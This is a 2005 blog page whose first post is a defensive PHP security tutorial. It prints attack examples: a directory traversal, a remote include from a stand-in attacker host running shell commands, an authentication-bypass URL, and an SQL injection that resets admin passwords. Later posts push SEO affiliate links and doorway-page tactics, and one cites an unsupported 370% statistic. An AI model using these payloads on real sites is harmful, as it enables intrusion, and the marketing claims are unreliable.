javascript hit counter Web World
Nikhil Sheth

Web World

This site is for php , mysql , flash,.... Inshort for any web related stuff

Tuesday, June 07, 2005

Secure Programming in PHP

Introduction

The goal of this paper is not only to show common threats and challenges of programming secure PHP applications but also to show you practical methods for doing so. The wonderful thing about PHP is that people with little or even no programming experience are able to achieve simple goals very quickly. The problem, on the other hand, is that many programmers are not really conscious about what is going behind the curtains. Security and convenience do not often go hand in hand -- but they can.

Dangers

Files

PHP has some very flexible file handling functions. The include(), require() and fopen() functions accept local path names as well as remote files using URLs. A lot of vulnerabilities I have seen are due to incorrect handling of dynamic file or path names.

Example

On a site I will not mention in this article (because the problem still has not been solved) has one script which includes various HTML files and displays them in the proper layout. Have a look at the following URL: http://example.com/page.php?i=aboutus.html The variable $i obviously contains the file name to be included. When you see a URL like this, a lot of questions should come to your mind:
  • Has the programmer considered directory traversals like i=../../../etc/passwd?
  • Does he check for the .html extension?
  • Does he use fopen() to include the files?
  • Has he thought about not allowing remote files?
In this case, every answer was negative. Time to play! Of course, it is now possible to read all the files the httpd user has read access for. But what is even more exciting is the fact that the include() function is used to include the HTML file. Consider this: http://example.com/page.php?i=http://evilhacker.org/exec.html Where exec.html contains a couple of lines of code: php
passthru
('id');
passthru ('ls -al /etc');
passthru ('ping -c 1 evilhaxor.org');
passthru ('echo You have been hax0red | mail root');
?>
I am sure you get the idea. A lot of bad things can be done from here.

Global Variables

Per default, PHP writes most of the variables into the global scope. Of course, this is very convenient. On the other hand, you can get lost in large scripts very quickly. Where did that variable come from? If it is not set, where could it come from? All EGPCS (Environment, GET, POST, Cookie, and Server) variables are put into the global scope.

The global associative arrays $HTTP_ENV_VARS, $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_COOKIE_VARS, $HTTP_SERVER_VARS and $HTTP_SESSION_VARS will be created when the configuration directive track_vars is set. This allows you to look for a variable only in the place you expect it to come from. Note: As of PHP 4.0.3, track_vars is always turned on.

Example

This security hole was reported to the Bugtraq mailing list by Ismael Peinado Palomo on July 25th, 2001. Mambo Site Server 3.0.x, a dynamic portal engine and content management tool based on PHP and MySQL, is vulnerable to a typical global scope exploit. The code has been modified and simplified. Under the 'admin/' directory, index.php checks whether the password matches the one in the database after posting the form: php
if ($dbpass == $pass) {
session_register("myname");
session_register("fullname");
session_register("userid");
header("Location: index2.php");
}
?>
When the passwords match, the variables $myname, $fullname and $userid are registered as session variables. The user then gets redirected to index2.php. Let us see what happens there: php
if (!$PHPSESSID) {
header("Location: index.php");
exit(
0);
} else {
session_start();
if (!
$myname) session_register("myname");
if (!
$fullname) session_register("fullname");
if (!
$userid) session_register("userid");
}
?>
If the session ID has not been set, the user will be directed back to the login screen. If there is a session ID, though, the script will resume the session and will put the previously set session variables into the global scope. Nice. Let us see how we can exploit this. Consider the following URL: http://example.ch/admin/index2.php?PHPSESSID=1&myname=admin&fullname=joey&userid=admin The GET variables $PHPSESSID, $myname, $fullname and $userid are created as global variables per default. So when you look at the if-else-structure above, you will notice that the script figures $PHPSESSID is set and that the three variables dedicated to authorize and identify the user can be set to anything you want. The database has not even been queried. A quick fix for this problem -- by far not the perfect one -- would be to check for $HTTP_SESSION_VARS['userid'] or $_SESSION['userid'] (PHP => v4.1.0) instead of $userid. If you are serious about making secure web applications read chapter 3.3.

SQL

Programming in PHP would be boring without a decent SQL database connected to the web server. However, assembling SQL queries with unchecked variables is a dangerous thing to do.

Example

The following bug in PHP-Nuke 5.x has been reported to the Bugtraq mailing on August 3, 2001. It is actually a combination of exploiting global variables and an unchecked SQL query variable. The PHP-Nuke developers decided to add the "nuke" prefix to all tables in order to avoid conflicts with other scripts. The prefix can be changed when multiple Nuke sites are run using the same database. Per default, $prefix = "nuke"; is defined in the configuration file config.php. Let us now look at a few lines from the script article.php. php
if (!isset($mainfile)) {
include(
"mainfile.php");
}
if (!isset(
$sid) && !isset($tid)) {
exit();
}
?>
And a bit further down: the SQL query. php
mysql_query
("UPDATE $prefix"._stories.
" SET counter=counter+1 where sid=$sid");
?>
To change the SQL query, we need to make sure $prefix is not set to its default value so we can set an arbitrary value via GET. The configuration file config.php is included in mainfile.php. As we know from the last chapter, we can set the variables $mainfile, $sid and $tid to any value using GET parameters. By doing so, the script will think mainfile.php has been included and $prefix has been set accordingly. Now, we are in a position to execute any SQL query starting with UPDATE. So the following query will set all admin passwords to '1': http://example.com/article.php?mainfile=1&sid=1&tid=1&prefix=nuke.authors%20set%20pwd=1%23 The query now looks like this: UPDATE nuke.nuke_authors set pwd=1#_stories
SET counter=counter+1 where sid=$sid");
Of course, anything after # will be considered as a comment and will be ignored.

Secure Programming

Awareness

Before taking any technical measures, you have to realize that you cannot trust any input from external sources. Whether it is a GET or POST parameter or even a cookie, it can be set to anything. User-side JavaScript form checks will not make any difference. ;)

Check User Variables

Every external variable has to be verified. In many cases you can just use type casting. For example, when you pass a database table id as a GET parameter the following line would do the trick: $id = (int)$HTTP_GET_VARS['id'];
or $id = (int)$_GET['id']; /* (PHP => v4.1.0) */ Now you can be sure $id contains an integer. If somebody tried to modify your SQL query by passing a string, the value would simply be 0. Checking strings is a little more difficult. In my opinion, the only professional way to do this is by using regular expressions. I know that many of you try to avoid them but -- believe me -- they are great fun once you got the basic idea. As an example, the variable $i from chapter 2.1. can be verified with this expression: php
if (ereg("^[a-z]+\.html$", $id)) {
echo
"Good!";
} else {
die(
"Try hacking somebody else's site.");
}
?>
This script will only continue when the $id variable contains a file name starting with some lowercase alphabetic characters and ending with a .html extension. I will not go into regular expression details but I strongly recommend you the book "Mastering Regular Expressions" by Jeffrey E. F. Friedl (O'Reilly).

Master the Global Variable Scope

I am glad I did not have much time to write this article in early December 2001, because in the meantime Andi and Zeev added some very useful arrays in PHP v4.1.0: $_GET, $_POST, $_COOKIE, $_SERVER, $_ENV and $_SESSION. These variables deprecate the old $HTTP_*_VARS arrays and can be used regardless of the scope. There is no need to import them using the global statement within functions. Do yourself a favour and turn the configuration directive register_globals off. This will cause your GET, POST, Cookie, Server, Environment and Session variables not to be in the global scope anymore. Of course, this requires you to change your coding practice a little. But it is definitely a good thing to know where your variables come from. It will help you prevent security holes described in chapter 2.2. This simple example will show you the difference: Bad: php
function session_auth_check() {
global
$auth;
if (!
$auth) {
die(
"Authorization required.");
}
}
?>
Good: php
function session_auth_check() {
if (!
$_SESSION['auth']) {
die(
"Authorization required.");
}
}
?>

Logging

In a production environment it is a good idea to set the error_reporting level to 0. Use the error_log() function to log errors to a file or even alert yourself via e-mail. If you are really concerned about security, you can even do some preventive "intrusion detection". For example, you could send yourself an e-mail alert when somebody plays with GET/POST/Cookie parameters and the regular expression function returns false accordingly.

Conclusion

Programming securely definitely needs a little more time than the "Wow, it works!" technique. But as you can see by the examples, you cannot afford to ignore security. I hope I could make you think about how to improve your existing applications and especially how to change your programming practice in the future. Happy hacking!

Monday, June 06, 2005

MySQL GUI : Navicat 2005 is now available

Navicat 2005 (MySQL GUI) is a MySQL database management tool which can convert Excel spreadsheets/MS Access to MySQL databases, eliminating time-consuming data entry and the errors that accompany it. It uses a Microsoft Access-like interface and comes with a comprehensive user manual.

Other useful features include Batch Job Schedule, Data Synchronization, Import/Export wizard, Visual query builder and Visual report builder. More than 100 new features and improvements have been added, including the ability to import data from ODBC databases, create Batch Job Scheduling, synchronize data, etc. Additionally, it supports MySQL 5.0 or above (support Stored Procedure and Views).

Navicat 2005 is available in three OS platforms - Window, Mac OS X and Linux.

Free trial version - http://www.navicat.com/download.html

Online Demo - http://www.navicat.com

Navicat Support Center - http://support.navicat.com

Navicat 2005 for Windows - http://www.navicat.com/detail.html

Navicat 2005 for Mac OS X - http://www.navicat.com/mac_detail.html

Navicat 2005 for Linux - http://www.navicat.com/linux_detail.html

Saturday, June 04, 2005

Google Sitemaps Program - Take Advantage

Google Sitemaps Program - Take Advantage

Google recently launched a new program called Google Sitemaps. This program (free, currently still in Beta) is designed to help website owners to get their website pages get crawled by google.

If you want to take advantage of Google Sitemaps, you need to place a Sitemap-formatted file on your webserver. By doing so you enable Google’s crawlers to find out what pages are present and which have recently changed, and to crawl your site accordingly. Google Sitemaps can help to get more of your web pages crawled and can also enable you to tell Google when contents on your site changes.

This sounds pretty good. However, the problem I see is that in order to get started, you have to install some scripts on your sever. Webmasters “should have knowledge of uploading files to their webserver, connecting to their webserver, and running scripts. In addition, Python version 2.2 must be installed on your webserver - check with your web hosting company if you are unsure". Bottom line: you have to be a technical guy or have a technical guy to help you in order to take advantage of Google Sitemaps. To make people’s life easier, Google also says “If any of these requirements are not met, you can still submit a Sitemap to the Google Sitemaps program in simple text format.".

Here the link to Google Sitemaps’ FAQ: https://www.google.com/webmasters/sitemaps/docs/en/faq.html. As webmasters and web owners, you might want to take advantage of Google Sitemaps to get more of your web pages crawled and also get your pages crawled faster.

Monday, May 30, 2005

Improving the Link Popularity of your site

Improving the Link Popularity of your site

Link popularity, i.e. the number of sites which are linking to your site, is an increasingly important factor as far as search engine placement is concerned. Other things remaining the same, more the number of links to your site, higher will be its ranking.

What is important is not only the number of links to your site, but also the types of sites which are linking to you. A link from a site which is related to yours is more valuable than a link from an unrelated site.

In this article, I explore different methods by which you can improve the link popularity of your site. I start with the methods that you shouldn't bother using, then go on to the moderately effective methods, and then end with the most effective methods you can use to boost the link popularity of your site.


1) Submitting your site to Free For All (FFA) pages

A common misconception among many Internet marketers is that while FFA pages may not directly bring in traffic to your site, it will help to improve the link popularity of your site, and hence, will indirectly bring in traffic through the search engines.

Nothing could be further from the truth. Most FFA pages can contain only a certain number of links at a time. This means that when you submit your site to a FFA page, your site will be placed at the top of the page. However, as more and more people submit their sites to the FFA page, your site will be pushed down, and finally, when it reaches the bottom of the page, it will be removed.

Now, since you can bet that plenty of other people are also submitting their sites to the FFA pages, your site will remain in these pages for only a short span of time. Hence, in order to ensure that the search engines see your site if and when they come to spider the FFA page, you will need to ensure that you submit your site to these FFA pages on a regular basis - at least once a week.

Even if you used an automatic submission program to do it, can you imagine a worse way to spend your time and/or money? Furthermore, many search engines recognize these pages which only contains links to other sites as FFA pages and may completely ignore them. And while I haven't yet seen any evidence that submitting to the FFA pages will actually penalize your site, there is every possibility that this might happen in the future.

Hence, when it comes to FFA pages, my advice is simple: don't even think about them.

2) Joining Reciprocal Link Services

Some people have recommended that in order to increase the link popularity of your site, you can join some reciprocal link services. The basic idea behind these services is that you add some pages to your site which contain links to other sites which are members of that service, and in exchange, these members will also add pages to their sites which will contain a link to your site. Theoretically, more the members of that service, more your link popularity.

However, I have plenty of reservations about using this method to boost the link popularity of your site:

i) Most of these services require that you add a visible graphical or text link from your hom page to the pages containing the links. If they require a graphical link, it can completely destroy the general look and feel of your site. Even if they require a text link, how would you feel if a visitor to your site clicked on such a link and found one of your competitors (who is also a member of this service) right at the top of a page?

ii) Most of these services give the same pages containing the links to each of its members, i.e. the pages that you are required to upload to your site are exactly the same as the pages which all the other members of that service are required to upload to their servers. Even the file names of the pages tend to be the same for all the members. Most search engines are now able to detect such duplicate pages in different domains and may either ignore the pages or may even penalize all these domains for spamming.


iii) Instead of linking only related sites with each other, most of these services link all the members with each other. This means that lots of unrelated sites will be linking to your site. As I mentioned before, links from unrelated sites are simply not as valuable as links from related sites.


Hence, I don't recommend that you join any reciprocal link programs.


3) Exchanging links with other webmasters

Another way of improving the link popularity of your site is to exchange links with other webmasters who have sites which are related to yours, but are not direct competitors. Here's how you can do it:First, open a database program like Microsoft Access and create a new table containing fields like FirstName, LastName, Email Address, URL etc. Then, make a list of the sites belonging to your competitors. Then, go to AltaVista , and type in the following in the search box:

link:somesite.com -url:somesite.com


where somesite.com is the domain name of one of your competitors. This will give you a list of all the sites which are linking to that competitor. Then, find out in what context a particular site has linked to your competitor. If this site is an affiliate of your competitor, then your chance of getting a link from this site is limited, unless you offer an even better affiliate program. However, if you find that this site has a Links page which contains links to other sites, one of which is a link to your competitor, then it is an excellent prospect for exchanging links. Find out the name and email address of the webmaster of the site and add them to your database. In this way, go through all the sites which are linking to your competitors, locate those sites which you think may want to exchange links with you, and build up your database.

Once you have done that, create a Links page in your site, and add the URLs of these sites to the Links page. Then, send an email to these webmasters, introduce yourself and your site, congratulate them on building an excellent web site, tell them that you have already added a link to their sites from yours, and then ask them whether they would be kind enough to add a link to your site. In your email, emphasize the fact that exchanging links in this way will be mutually beneficial for both of you because it will help both of you drive traffic to your sites. Wait for a month or so to see the response. Some webmasters will agree to link to you. Others will simply not respond. After a month, remove the links to those sites who are not interested in exchanging links and using the methods outlined above, try to locate more sites with which to exchange links.

When you send the email to the webmasters, make sure that you personalize each email. Don't begin every email with "Hello Webmaster", begin with "Hello Mike". If you want, you can use email merge programs to automatically personalize each email. You can check out some email merge programs by going to http://download.cnet.com and searching for "email merge" (without the quotes).

The main problem with this method of improving the link popularity of your site is that it takes a lot of time. You may find that the number of links you manage to get just does not justify the time that you spend over it. The best way to automate the whole process is to use a program called Zeus. Zeus will allow you to locate and exchange links with sites that are related to yours and manage those links on an ongoing basis in a fraction of the time it would take for you to do it manually. You can download a free trial version of Zeus at the following URL:

http://www.1stSearchRanking.com/t.cgi?3319&zeus/

While the program does take a while to get used to, the results that you can obtain with it are simply phenomenal. I highly recommend that you download the free trial version and try it out.

Another thing that you can do is to mention in your Links page that you are willing to exchange links with other web sites. This allows other webmasters who come to your web site to propose a link exchange. 4) Starting an Awards Program

A moderately effective method of improving the link popularity of your site is to start an awards program. You can have web sites which are related to yours apply for an award from your site. The sites which win the award get the chance to display the logo for your award. This logo is linked to your site, preferably to a page which contains more information on the award.


If you publish a newsletter, consider declaring the winners in your newsletter. You can also perform a review of the winners' sites in your newsletter. This adds useful content to your newsletter and also gives more webmasters the incentive to apply for your award, since you may review their sites in your newsletter. This also gives them the incentive to subscribe to your newsletter to see if they win the award.

Make sure that you give awards to only those sites which deserve to win. If you give your award to sites which don't deserve it, your award will have little credibility, which will, in turn, hurt the credibility of your company. Furthermore, make sure that the logo you design for the award looks professional. If it doesn't, not many webmasters will want to display it in their sites.

) Giving testimonials

This may sound a bit unusual, but giving testimonials for products or services which you find useful can be another moderately effective way of improving the link popularity of your site. If you really like a product, simply write to the company and tell them why you liked the product so much and how it has helped you. Chances are, the company will write back to you to thank you for your comments and will ask you for permission to display your comments in their web site. Tell the company that you have no problems if they publish your comments, but request them to add a link to your site along with the testimonial. There is every possibility that the company will agree since publishing the URL of your web site gives more credibility to the testimonial.

Of course, please don't go about giving testimonials to every company you can locate just because it will improve your link popularity :-)

6) Posting to Message Boards and Discussion Lists


Another moderately effective method of increasing the link popularity of your site is to post to online message boards. At the end of every message that you post, you can sign off by mentioning your name and the URL of your web site. If the message board allows it, you can even include a short promotional blurb about your site at the end of your posts. However, make sure that the individual messages that are posted to that message board are archived in static HTML pages (i.e. the URLs for the individual messages should not contain a "?"). Otherwise, the search engines will consider these pages to be dynamic pages and may not spider these pages and hence, will not be able to find your link.


Email based discussion lists which are archived on the web in static HTML pages can also be used to boost the link popularity of your site in a similar manner. In this case, the signature file that you use with your email program should contain the URL for your web site.



7) Starting a Link Contest


A good method of improving the link popularity of your site is to give away prizes to other webmasters if they link to you. The prizes that you give out should ideally be something which other webmasters will find valuable enough to want to link to you, but which do not cost you too much. For instance, if you publish a newsletter, and have unsold ad inventory, you can give away some free advertisements in your newsletter to the winners. If you sell a software (or an ebook), you can give away a free copy of your software or ebook to the winners, since it doesn't cost you anything to produce an additional copy of digital goods like software and ebooks.


Link contests work best if you run the contest on a continuous basis and if you declare new winners frequently. If you run the contest for a few months, and then stop it, the webmasters who had linked to you will all remove their links. However, if you run it on a continuous basis, and declare new winners every month or so, the webmasters will have the incentive to keep their links to your site.


Also, make sure that you require all participants to have a link to your site either in their home page, or in an internal page of their site which is linked to their home page. Also ensure that the page which contains the link is no more than two levels deep from their home page (i.e. it should not take more than two clicks to go from the home page to the page containing the link). If they don't do this, the search engine spiders may not index the page which contains the link to your site, and hence, may not find your link.



8) Writing articles and allowing them to be re-published


This is by far one of the best ways of improving the link popularity of your site, and one of my favorites. Whenever I write an article on search engine placement, I first publish it in my newsletter and then I publish the article in my site as a separate web page. I also submit it to the following article submission sites:


http://www.ezinearticles.com/add_url.html
http://www.ideamarketers.com
http://www.marketing-seek.com/articles/submit.shtml
http://certificate.net/wwio/ideas.shtml
http://www.web-source.net/articlesub.htm


Many webmasters and ezine publishers frequent these article directories in search of articles. Submitting my articles to these directories gives them the opportunity of re-publishing my articles. While I have had some success with each of the above directories, by far the best among them is the ezinearticles.com directory.


Now, at the end of each article, I mention that people are free to re-publish the article as long as they include my resource box (i.e. my bio) at the end of the article. I always include the URL of my site in the resource box. This means that whenever someone publishes one of my articles in his/her web site, I have another site linking to my site. Also, many ezine publishers archive their ezines in their web sites. If they have re-published my article in a particular issue, I again get a link.


Writing articles is also an excellent viral marketing tool. As some webmasters and ezine publishers publish my articles, other webmasters and ezine publishers will read my article. Some of them, in turn, will publish my article, which will again be read by other webmasters and ezine publishers, some of whom will publish it... and so on.


Also, since only web sites related to mine would be interested in publishing my articles, all these links tend to come from related sites, which, as I mentioned earlier, are more valuable than links from unrelated sites.


Writing articles, of course, has another very important benefit - if you write good articles, it makes you known as an expert in your field. This helps to improve your credibility, which makes people more comfortable about buying your products or services.


Some notes about writing articles:


i) I have learnt through experience that some webmasters will publish other people's articles and will display the complete resource box but will not link to the URL mentioned in the resource box. In order to prevent this, you need to explicitly state that the article can be published only if the URL mentioned in the resource box is linked to your site.


ii) Your resource box should not be too long - it should be no more than 6 lines long, formatted at 65 characters per line. Otherwise, other webmasters and ezine publishers will hesitate to publish your article.



9) Starting your own affiliate program


This is another excellent way by which you can improve the link popularity of your site. When you have your own affiliate program, you give other webmasters the incentive to link to you. In this case too, since most of these web sites will be related to the industry in which you are operating, these links will be more valuable than links from unrelated sites.


Now, when you start your affiliate program, you need to decide whether you want to run the program yourself, or whether you want to outsource it from a third party. While outsourcing your affiliate program has a number of benefits, doing so will not help you improve the link popularity of your site, because affiliates are going to link to the third party's site. In order to improve the link popularity of your site, you need to ensure that the affiliate links are pointing to your domain.


The affiliate program software that I highly recommend and have used for the affiliate program of our search engine positioning services is Kowabunga Technologies' My Affiliate Program, which is available at http://www.1stSearchRanking.com/t.cgi?3319&affiliateprogram/ . Although this software is hosted in a domain owned by Kowabunga Technologies, they give you the option of having the affiliate links pointing to your own domain.



10) Submitting to the directories


This is by far the most important step as far as improving the link popularity of your site is concerned. As I mentioned before, what is important is not only the number of links to your site, but also the quality of the links to your site. No links are as important as links from some of the major directories like Yahoo!, the Open Directory etc. However, Yahoo! currently requires a payment of $299 per year in order to list any commercial site. Paying them $299 per year just to improve your link popularity is probably not cost effective. But, the Open Directory is free, and you should definitely get your site listed in the Open Directory.


Also, you should submit your site to as many of the smaller directories as possible. You can get a list of such directories at

http://dir.yahoo.com/Computers_and_Internet/Internet/World_Wide_Web/
Searching_the_Web/Search_Engines_and_Directories/



11) Analyzing the quality of links


As mentioned earlier, what is important is not only the number of sites linking to you, but also the quality of the links that you have. Until now, there has been no easy way of checking the quality and relevancy of sites that are linking to you or the quality and relevancy of sites that you are thinking of asking for links from. You could have done it manually, but it would take a tremendous amount of time. However, a new software product called Optilink automates this process to a large extent. In addition to doing an excellent job in helping you determine the quality and relevancy of sites that already link to you or might link to you, it also does the following:


i) analyzes the link structures of your top ranking competitors and tells you why they rank well, so that you can emulate the same tactics that your top ranking competitors are using.


ii) allows you to do "what if" analysis - it tells you what sort of rankings you can expect if you adopt a particular linking strategy.


iii) monitor the sites that you have exchanged links with to ensure that they are still linking to you and are linking to you the way you want them to.


If you are thinking of improving the link popularity of your site, or are already doing so, I highly recommend that you obtain this product before you proceed. You can find more information on Optilink at:


http://www.1stSearchRanking.com/t.cgi?3319&optilink/

Creating Keyword Rich Pages

Creating Keyword Rich Pages

Once you have established the keywords for which you should optimize your site for the search engines, it is time to figure out how you can get a high ranking in the search engines for those keywords. The solution is to create Keyword Rich Pages (KRPs) - pages which provide good content and in which a particular keyword is repeated a number of times so that the page gets a top ranking for that keyword.

This article is focused on how you should create these KRPs. I am assuming you have a working knowledge of the different HTML tags like the Title tag, the Meta Description tag, the Meta Keywords tag, the Heading tags, the Alt Tag etc. If you don't, just go to http://www.utoronto.ca/webdocs/HTMLdocs/NewHTML/htmlindex.html for a good introduction to such HTML tags.


Now, let us assume that your company sells packaged tours to Australia, and that you are targeting the keyword "travel to australia". Here's how you create the KRPs:


The Title Tag:


The first and most important tag to consider is the Title tag. You should always begin the Title tag with the keyword that you are targeting. Also remember that the search engines are going to display the Title tag while they are displaying the results of a search. Hence, you need to make the Title tag attractive to humans as well.


Here is one Title tag that I may have used: "Travel to Australia and discover its scenic beauty". Have a look at the Title tag - it uses the keyword right at the beginning and also tells people how beautiful a place Australia is.


Of course, all Titles need not be like the one I used. The Title that you use depends on the subject matter of your site. However, you should follow all the general rules that I have outlined here.


Meta Description Tag:


The Meta Description tag is used by many search engines to provide a short description of the page that is listed in the search results. Hence, like the Title tag, it is important that the Meta Description tag be keyword rich as well as attractive to humans.


The rules for the Meta Description are more or less the same as those for the Title tag. However, the content of this tag will generally be longer than that of the Title. Here's what I may have used in the Meta Description tag:


"Travel to Australia - We take care of all the details of your trip so that you can travel with complete peace of mind."


Note how this description repeats the keyword and also the benefit that it stresses - it says that the customer will be able to travel without having to worry about the intricate details of the trip - you will take care of them.


Meta Keywords Tag:


The Meta Keywords tag has become less and less important as far as search engine optimization is concerned. In fact, you can get top rankings without having anything in the Meta Keywords tag at all. However, just to be on the safe side, you would want to include some keywords in the Meta Keywords tag. You should also include some of the common upper/lower case variations of the keyword. The rules for the Meta Keywords tag are pretty simple - don't repeat any keyword in the Meta Keywords tag more than three times and don't repeat any keyword one after the other. Here's what I may have used in the Meta Keywords tag:


"Travel to Australia, tourism, travel to Australia, Down Under, TRAVEL TO AUSTRALIA"


Note how I have introduced "tourism" and "Down Under" just to separate the different instances of the keyword.


Body of the page:


Now we come to the actual body of the page. Begin by getting hold of a nice (but not too large) picture which is applicable for the page that you are creating. In the present case, I might include a picture of the lotus shaped Sydney Opera House. Place this picture at the top of the page. In the Alt tag for the picture, just mention your target keyword once, i.e. the Alt tag would be "Travel to Australia". You can include other words in the Alt tag, but it should start with the keyword you are targeting.


Once you've put up the picture, it is time to create a Heading for your page. Use the H1 tag to do so. Again, in the H1 tag, mention your target keyword once, i.e. like the Alt tag for the picture, the H1 tag could be "Travel to Australia". Again, like the Alt tag, you can include other words in the heading, but the heading should start with the keyword you are targeting.


Now it's time to create the actual text of the page. The way you create the text of your page would depend largely on what you want the visitor to do after reading this page. In some cases, you may simply want the visitor to go to the home page or another specific page in your site after reading this page. In this case, you should write the text in such a way that the visitor is attracted to the page that you are targeting. You would also want to provide links to the home page or the specific page that you are targeting at strategic places in the KRP. Or, you may want the visitor to click on the link to an affiliate program that you are a member of. In this case, you would stress the benefits that the visitor gets by purchasing the product or service that the affiliate program is selling. You would also want to provide links to the affiliate program at strategic places in the page and/or at the end of the page. Whatever it is that you want your page to do, there are some general rules to follow:

1. The first thing to remember is that some search engines don't recognize the Meta Description tag. These search engines will often simply take the first few lines of text in the body of your page and display that as the description. Hence, you must ensure that the first few lines of text in your page are attractive to human beings.

2. Ensure that as many sentences as possible in the page contain your target keyword once. The keyword shouldn't just be placed on an ad hoc basis - the way the keyword is placed in every sentence should actually make grammatical sense and the repetition should be such that your human visitors do not feel that you have deliberately repeated a particular phrase throughout the page. This is not only important from the point of view of ensuring that your readers don't get a bad impression of your site, but also from the point of view of search engine optimization - the search engines may penalize your page for spamming if they find that you have randomly repeated the keyword throughout the page. Also, while repeating the keyword in the page, try to repeat the keyword once near the top of the page and once near the bottom.

3. Make sure that your paragraphs are not too long - each paragraph should be no more than 3 or 4 sentences long. This is because people on the web simply don't have the time or the inclination to read long paragraphs.

4. Try to ensure that the page contains links to other pages with the keyword being present in the text under the link. This can often lead to a higher ranking for your page.

5. If possible, link to other pages which have the keyword in the file names. This can again lead to a higher ranking for your page.

6. There is no hard and fast rule regarding the total number of words that should be present in the KRPs. As a rule of thumb, try to ensure that there are between 500-600 words. However, if the number of words falls a bit short of or exceeds this limit, don't worry too much.

Once you have created the page, ensure that the name of the file in which it is saved contains the keyword and that the individual words of the keyword are separated by hyphens. In this case, the name of the file would be travel-to-australia.html. This will get you a higher ranking in the few search engines which give a lot of emphasis on the keyword being present in the file name.

That's it! When you want to target another keyword, simply create another KRP for it using the procedure outlined above.

After you have created the KRPs, you cannot simply upload them to your site and submit them to the search engines. This is because the search engines take a rather dim view of pages which only contain outgoing links to other pages but do not contain any incoming links from other pages. The search engines may penalize sites which have such pages.

What you need to do is to directly or indirectly link the KRPs with your home page. If you are going to create many KRPs for your site, it will be impractical to link the home page directly with all the KRPs as this will needlessly clutter your home page. Hence, what you should do is to create a separate page in your site called a Sitemap page (name it something like sitemap.html). Add links to all the KRPs from the Sitemap page. The text that you use to link to a particular KRP should be the same as the keyword that the KRP is being optimized for. Hence, the link to the travel-to-australia.html file should say "Travel to Australia".

Now, some search engines refuse to spider pages which only contain links to other pages and nothing else. Hence, if the Sitemap page only contains links to the KRPs but contains no other content, the search engines may ignore this page. Hence, what you can do is to add a short description of the content of each of the KRPs after you have added a link to that KRP in the Sitemap page. This ensures that the search engines will not ignore this page.

After doing all this, simply link the home page of your site with the Sitemap page using a text link. Then, submit your home page, the Sitemap page and each of the KRPs to the search engines. When you are submitting these pages, to be on the safe side, make sure that you submit no more than 1 page per day to any search engine - otherwise, you run the risk of some search engines ignoring some of the pages you have submitted. You can submit your site by going to the individual "Add URL" pages of each engine. Or, in order to save time, you can use our free submission tool which helps you submit your site manually to the search engines, without having to go to the individual "Add URL" pages of each engine. The tool is available at http://www.1stSearchRanking.com/t.cgi?3319&submission.htm

Follow all the rules that I have outlined in this article and you can soon see your search engine blues disappear for ever!

Optimization - Free Google tools

There's no doubt that Google has captured the hearts and minds of surfers and webmasters alike in recent years. Google tools have also become a common sight, thanks to the Google Web APIs (http://www.google.com/apis/).

Using tools such as Google Web API (Application Program Interface), software developers can query the billions of pages in Google's databases from their own programs, which has led to some amazing web applications being developed and released to the public.

Here's a selection that I'll be updating from time to time of the more webmaster-oriented tools that can assist with search engine optimization:

http://www.rankpulse.com/
Rank Pulse is an online tool that provides a look at the daily fluctuations of Google results based on the movements of rankings of sites in relation to keywords that the company monitors.

http://www.googlealert.com/
Google Alert can keep track of what the web is saying about a particular person, company or web site.

http://www.webconfs.com/
Similar page checker. This free tool allows you to check the similarity between two pages.

http://www.google-dance.net/
Google Dance tool. The Google "Dance" (update) can be identified when the backlink counts of major sites are different on several specific Google data centers. This tool updates every 60 minutes and you can also check your own backlinks on the data centers.

http://www.googlefight.com/
Google Fight. Wondering which keywords for a particular subject are most popular? Google Fight allows you to enter 2 keywords or phrases and compare the results.

http://www.researchbuzz.org/archives/001405.shtml
Goofresh is a tool to search for sites added in the last 24 hours, 48 hours, 7 days or last 30 days.

http://www.void.be/googletool.html
Google Tool. Search for results on one or more of Google's 15 data centers.

http://douweosinga.com/projects/googlehistory
Google history. Find out in what year an event occurred (post 1800)


http://douweosinga.com/projects/googlepos
Google Pos. Discover the ranking for a particular site for a keyword or keyphrase.

http://www.googlerankings.com/
GoogleRankings. Another tool for checking position based on keywords.

http://www.markhorrell.com/tools/pagerank.html
The PageRank Calculator is designed to mimic the workings of the PageRank algorithm to calculate an estimated score.

http://www.googleguy.de/google-yahoo/
Google - Yahoo Comparison. Allows for a side by side search of both Google and Yahoo.

Friday, May 20, 2005

The 5 Biggest Mistakes Almost All Web Designers Make -- And Why These Mistakes Could Cost YOU A Fortune!

Huge Mistake #1: Creating a Website with Flash -- Did you know in a recent study, top internet marketers discovered that having a website created with Flash, actually DECREASED the response from prospects and customers by as much as three-hundred-and-seventy percent?

Here's why: Your prospects and customers are most likely visiting your website using all types of different computers, connection speeds and internet configuration settings...

What may look GREAT to one visitor, may not even appear for another! You could very easily have shelled out hundreds or even thousands of dollars to have a website created using the Flash technology, only to find out that some of your visitors will never see it! (not to mention the loading times can cause your visitor to close your site, never to return again.)

Huge Mistake #2: The "Internet Catalog" Approach -- You see this everywhere. Good, honest and hardworking businessmen and women get online to sell their products or services, and have a site created for them that contains a link to just about everything they offer on one page. Their thinking goes along the lines of, "...well, I don't want to leave anyone out. If they come to my site, I want to make sure I have what they're looking for..." -- This way of thinking could not be further from the truth.

Here's why: There's an ancient rule that goes back to the very beginning of direct-marketing on the internet, taught by the richest, most legendary and well-respected internet marketers of all time...

"When you give your prospects too many choices, they become confused and aren't sure what to do next. Confused people never buy anything."

Huge Mistake #3: Optimizing Your Sales Site for the Search Engines -- You'll see this taught in nearly every "internet marketing" course, manual or eBook out there... "You must optimize every page of your website for the search engines!" -- In fact, this false teaching is accepted as 'gospel truth' so often, that most web designers will offer to do this for you at no, or little extra cost...

What they DON'T understand is that certain words and phrases must be either re-worded (to make it "keyword rich") or taken out completely, just to be looked upon highly by the mighty search engines -- and this could KILL your sales, literally overnight.

Here's why: When you or a hired web designer optimize your SALES page (i.e. any web page designed to sell your products and services) to get a higher listing in the search engines, you're going to have to sacrifice the pulling-power of your sales copy (i.e. written sales material) just to get those higher listings. Sure, this can bring you more traffic -- but what good is all the traffic in the world, if your visitors arrive at your website and aren't compelled enough to read why they should order your product?

For years, it has been taught that you should always try to find a "balance" of SEO (Search-Engine-Optimization) mixed with promotional copy designed to sell your products and services...

WRONG AGAIN! -- The truth is that you should NEVER optimize your sales page for the Search Engines. Instead, you should create tiny "entry pages" for each keyword related to your product or service, (highly optimized for the Search Engines) and have them link to your main sales site! (we can show you exactly how to do this quickly and easily and get *massive* targeted traffic from the Search Engines - without ever *touching* your sales site!)

